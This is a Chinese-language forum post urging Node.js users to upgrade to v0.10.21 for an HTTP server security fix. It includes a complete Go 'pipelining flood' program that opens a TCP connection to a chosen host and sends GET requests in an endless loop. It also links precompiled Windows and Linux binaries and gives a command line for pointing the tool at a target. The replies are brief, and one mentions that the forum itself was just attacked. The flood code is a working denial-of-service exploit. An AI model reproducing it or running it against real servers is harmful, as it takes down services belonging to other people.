提醒更新Node v0.10.21,以防exploiter
发布于 1年前 作者 pathletboy 1212 次浏览

以下是官方说明:

This release contains a security fix for the http server implementation, please upgrade as soon as possible.

尽快更新吧,附上测试工具代码

package main

/*
    A simple pipelining flood for nodejs
    Author    pathletboy[at]gmail.com
    Date    2013-10-18
*/

import (
    "flag"
    "log"
    "net"
)

func main() {
    host := flag.String("host", "", "specify the target")
    flag.Parse()
    if *host == "" {
        flag.PrintDefaults()
        return
    }
    var conn net.Conn
    var err error
    if conn, err = net.Dial("tcp", *host); err != nil {
        log.Fatal(err)
    }
    for {
        if _, err = conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + *host + "\r\nAccept: */*\r\n\r\n")); err != nil {
            log.Fatal(err)
        }
    }
}

编译好的bin(win/linux)

http://pb.itsong.com/floodnode.7z

floodnode -host="xxx.com:xx"

5 回复

== golang 楼主黑得漂亮 (开玩笑哈~)

不熟悉, 求讲解~

有一个非常简单的node攻击代码, 等过几天再发吧. cnode刚才也被攻击了.

已更新

感谢通知。

回到顶部